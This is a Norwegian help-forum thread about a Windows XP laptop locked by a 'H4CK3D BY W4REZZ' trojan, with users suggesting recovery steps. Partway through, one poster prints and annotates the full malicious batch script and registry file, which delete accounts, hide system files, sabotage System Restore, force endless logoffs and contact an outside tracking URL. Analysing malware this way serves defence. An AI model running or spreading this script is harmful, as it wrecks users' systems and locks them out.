Mulig hacket pc?

15 innlegg i emnet

Skrevet (endret)

Hei

En venn av meg har fått et problem på sin windows xp laptop:

Ved oppstart (før man logger seg på) vises et vindu med titteltekst:

H4CK3D BY W4REZZ

og meldingen:

Happy day!

Det er tre brukere registrert; Administrator, Hacked, og Guest. Guest konto er den eneste som "virker" bortsett fra at skrivebordet er helt blankt. Den eneste muligheten til å kjøre programmer er via Task Manager (får kun kjørt de prog man har rettigheter til som Guest).

Ved å velge Administratorbrukeren dukker et nytt vindu opp med meldingen om at pc slås innen x antall sekunder (og det gjør den).

Har kjørt virussøk med AVG som rapporterer en trojaner men den klarer ikke å fjerne den og systemgjennoppretting er umulig fordi man ikke får logget seg på som Administrator.

Slik jeg ser det så er det vel mulig at sønnen i huset har fått noe grums via CS kanskje. Har søkt litt på nettet men kan ikke finne en annen måte å fikse problemet på enn å formatere og reinstallere alt på pc'n. Her er det jeg fant:

http://www.virtualplastic.net/msgboard/thr...amp;thread=1084

http://www.trojaner-board.de/47934-computer-gehackt.html

Er ikke superstø i tysk selv men det er i alle fall klart at andre har opplevd det samme.

Noen ideer?

Bjørn

Endret av KongKlykken
Emnet flyttet til: Forumet > Programvare & Internett > Virus og antivirus. //Moderator
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Prøvd og starte PCen i sikerhets modus uten internet og slete kontoen som heter haced?

Og den siste linken du ga er overstat med google så ikke perfekt menemen;

Hei

Jeg har siden blitt et tilsynelatende større Problem.Ich virkelig å be de hjelpe, fordi det er en alvorlig sak. Så jeg fikk meg en trener for et Computerspeil lastet ned. Da jeg utpakket filen un endelig i gang. Plutselig går automatisk til Internet Explorer og jeg kan kort se et tall (Det var ca 2887). Etter at maskinen min avsluttes umiddelbart (jeg deretter avbrutt Internett direkte). Når jeg da kom opp igjen, vises en kort stund før jeg kan klikke med det som PC-bruker vil jeg starte message''Happy Day!''Med tittelen H4ck3d ved w4r3z.Nun Jeg kan bare klikke OK. Min Useracc for Windows er nå hacket. Jeg kan ikke med Brukerkontoer PCen starter. Hvis jeg bruker PCen i sikkermodus ønsker det krever et passord fra meg (jeg hadde tidligere aldri vært et passord). Jeg spør om hjelp og være glad om alle Antwort.Ich KABE Windows XP SP2

mfg

Phipps

Her er et svar han har fått:

Häst du noen gang prøvd i sikkermodus for å starte og gjennomføre et system der?

Så i sikkermodus:

Start / Alle programmer / Tilbehør / Systemverktøy /

System / datamaskinen til et tidligere

Tid å gjenopprette.

Nå er en kalender som vises på den siste fet

Klikk på dato / 2 ganger med ytterligere bekrefte og da har du til å gå

los, PC-en vil bli kjørt ned.

Deretter se på om det har brakt og hva systemet er ganske vanlig å starte dem!

Endret av Shudo
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Ja, glemte å si at jeg har forsøkt sikkermodus med samme resultat og samme (lite) hyggelige melding

Bjørn

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Ved å velge Administratorbrukeren dukker et nytt vindu opp med meldingen om at pc slås innen x antall sekunder (og det gjør den).

Ctrl+alt+del->fil ny oppgave(kjør) cmd

Shutdown -a

Dette stopper nedtelling.

Skriv dette i kjør vinduet

c:\windows\explorer.exe

Da virker skrivebord igjen tenker jeg.

Kjører prosess explorer.exe kan du lukke den og gjøre det over.

Last Combofix ned ,legg på skrivebordet.

Ikke klikk på vindu mens programmet kjører.

post logg C:\combofix.txt

Last ned MBAM til skrivebordet.

Velg Norsk språkdrakt-->kjør hurtig systemskann.

Når MBAM er ferdig åpner den en logg,den poster du.

Endret av snippsat
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Skriv dette i kjør vinduet

c:\windows\exeplorer.exe

Da virker skrivebord igjen tenker jeg.

Skal være c:\windows\explorer.exe ;)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Ja rettet opp ;)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

sår du stoppet nedtellingen med og skrive shutdown -a

så kan du jo prøve og så skrive msconfig i kjør og gå på oppstart fjerne alt unødvendig som ikke trengs i oppstart. (fjern alt uten om det du vet windows trenger for og starte opp.

Og for og fjerne haced kontoen så kan du skrive cmd i kjør. I cmd Skriver du: Net user (brukernavn) /del

Eventuelt Net user (brukernavn) /delete

Dette varierer fra pc til pc

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Ctrl+alt+del->fil ny oppgave(kjør) cmd

Shutdown -a

Dette stopper nedtelling.

Takk, skal prøve, men meldingen om at pc slås av er ikke en "systemmelding" slik jeg ser det, men mer som den lite hyggelige jeg beskrev først. Den popper opp øyeblikkelig når man klikker på Administrator brukeren. Jeg kommer aldri inn som admin.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

har du xp eller vista?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

har du xp eller vista?

Han har xp på laptop'n

Skal se om jeg får fulgt oppskriften ovenfor og dumpe log her

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Hvis linkene dine stemmer på beskrivelser er det en haug av "tukling" her med mye forskjellig.

Det er blitt endret på masse små detaljer som skal vanskeliggjøre å rette opp dette. En manuell gjenoppretting er "tunga rett i munnen" hvis du klarer å komme til et slik punkt. Jeg ville vurdert reinstallering - i hvert fall etter en tid (unngå å somle bort FOR mye tid).

Her bør du legge opp en slik plan som et alternativ. Redde ut data via en bootbar CD og lignende løsninger ?

Du får 1 forslag fra meg (logg på som Guest først):

Du kan prøve Logg av --> Logge på ny bruker --> brukernavn Admin (eller brukernavn YOUAREHACKED)

-------

Resten er analyse av 1 av de jeg fant på nettet. Noe er trolig blitt modifisert fra 2007 til 2008

Cheat.bat ???

@echo off
net user Administrator reg
net user %username% /delete ----------> sletting av brukerkonto
net user YOUAREHACKED /add ------> nytt hacket brukernavn
start /B regedit.exe /S settings.reg --------> endringer i registeret i fil settings.reg
cls
shutdown -s -f -t 30 -c "Please wait.."
ren %windir%\media\ download ---------> omdøpt C:\Windows\media til C:\Windows\download
cls
start /B [url="http://www.download.com/"]http://www.download.com/[/url]
cd %windir%
attrib %windir% +H -------------------------------> Skjule mappe C:\Windows
attrib %windir%\explorer.exe +R +H -----> Skjule explorer.exe
attrib %windir%\regedit.exe +R +H -------> skjule regedit.exe
echo pause>notepad.exe -----------------> Ødelegge notepad.exe ? Eller bare output til notepad ?
attrib %windir%\notepad.exe +R +H -----> skjule notepad.exe
rename %windir%\explorer.exe reg ------> omdøpe explorer.exe til REG ???
cls
start /b %systemroot%\system32\oobe\msoobe.exe /a ----> Windows Genuine Advantage (registrering av Windows)
echo run=cmd.exe>%windir%\win.ini ------> opprette win.ini (for å kjøre cmd.exe under oppstart)
rename %SystemRoot%\System32\restore\filelist.xml no1 ----> tukle med Systemgjenoppretting
rename %SystemRoot%\System32\restore\srdiag.exe no2 ---> tukle med Systemgjenoppretting
cls
goto nice
:nice --------------------------> resten av skriptet går i loop opp hit igjen
start /B /HIGH [url="http://fen.xf.cz/logo.php"]http://fen.xf.cz/logo.php[/url] ----> denne teller antall "besøk"/antall som er blitt rammet.
shutdown -l -f
cls
goto nice[/codebox]

Dette må være settings.reg ???

[codebox]Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,shutdown -l -f" ---> Logg av / Lukk programmer
"LegalNoticeCaption"="H4CK3D BY W4REZZ"
"DefaultUserName"="Admin" --------> Her har du fått nytt brukernavn
"LegalNoticeText"="Happy day!"
"PowerdownAfterShutdown"="1" ------> vet ikke hvorfor denne er endret fra NEI til JA ?
"HibernationPreviouslyEnabled"="0" ----> eller hvorfor denne er endret fra JA til NEI ?
"SfcQuota"="TASKMAN.EXE" ------> denne er et tall 0xffffffff hos meg
"System"="Linux" ---------------> blank hos meg
"VmApplet"="cmd.exe" ----------> rundll32.exe shell32, Control_RunDLL "sysdm.cpl"
"WinStationsDisabled"="1" -----> endret fra NEI til JA
"shell"="" -----------------> Explorer.exe

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"DisplayName"="Windows Genuine Advantage Validation Monitor"
"Description"="Monitor WGA"
"ImagePath"="cmd.exe"
"Start"="0"
"ErrorControl"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"EnableDCOM"="N"

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Får du kjørt combofix på en av kontoene eller i sikkerhetmodus så får vi nok ordnet opp.

En annen mulighet er Ctrl+alt+del->fil ny oppgave(kjør)

Lim inn fet tekst %systemroot%\system32\restore\rstrui.exe

Sette de tilbake til en dato før problemet oppsto.

Endret av snippsat
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Får du kjørt combofix på en av kontoene eller i sikkerhetmodus så får vi nok ordnet opp.

En annen mulighet er Ctrl+alt+del->fil ny oppgave(kjør)

Lim inn fet tekst %systemroot%\system32\restore\rstrui.exe

Sette de tilbake til en dato før problemet oppsto.

Det hele endte med blue screen of death (uten at jeg kan forklare hvorfor) så løsningen ble å boote med win xp cd i og kjøre reinstallasjon.

Jeg har leita litt og fant spor etter "h4ck3d by w4r3zz" på ei side som både Google Chrome og Nav advarer mot. Håper poden heretter styrer unna hacks og sider med nakne damer.

Takker for alle tips!

Bjørn

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Jeg fulgte mange av de samme sporene - det peker mer mot jukseprogrammer for CS enn mot "cracks og lettkledde damer". Det varer vel ikke lenge før han er i DEN alderen heller.

Jeg anbefalte "alternativ plan" fordi dette ikke dreide seg om ordinær spyware som kan fjernes, men om et SCRIPT som hadde modifisert masse. Du ville hatt masse problem med å rette opp ting hvis du hadde klart å komme inn. I heldig fall kunne det kanskje holdt med å fikse 2 filer som var tuklet med på SystemRestore - men jeg tviler litt på det.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Jeg fulgte mange av de samme sporene - det peker mer mot jukseprogrammer for CS enn mot "cracks og lettkledde damer". Det varer vel ikke lenge før han er i DEN alderen heller.

Jeg anbefalte "alternativ plan" fordi dette ikke dreide seg om ordinær spyware som kan fjernes, men om et SCRIPT som hadde modifisert masse. Du ville hatt masse problem med å rette opp ting hvis du hadde klart å komme inn. I heldig fall kunne det kanskje holdt med å fikse 2 filer som var tuklet med på SystemRestore - men jeg tviler litt på det.

Fant spor i begge retninger for å si det slik. Et søk i altavista fører bla til en side som 11 åringen ikke trenger å hvile øynene på riktig ennå. Vet ikke helt om CS er så mye bedre for et ungt topplokk heller men jeg regner med at de har hatt et lite familieråd i dag :)

Og nå er både Mbam og Comodo installert på den kurerte laptop'n.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!


Start en konto

Logg inn

Har du allerede en konto? Logg inn her.


Logg inn nå

  • Hvem er aktive   0 medlemmer

    Ingen innloggede medlemmer aktive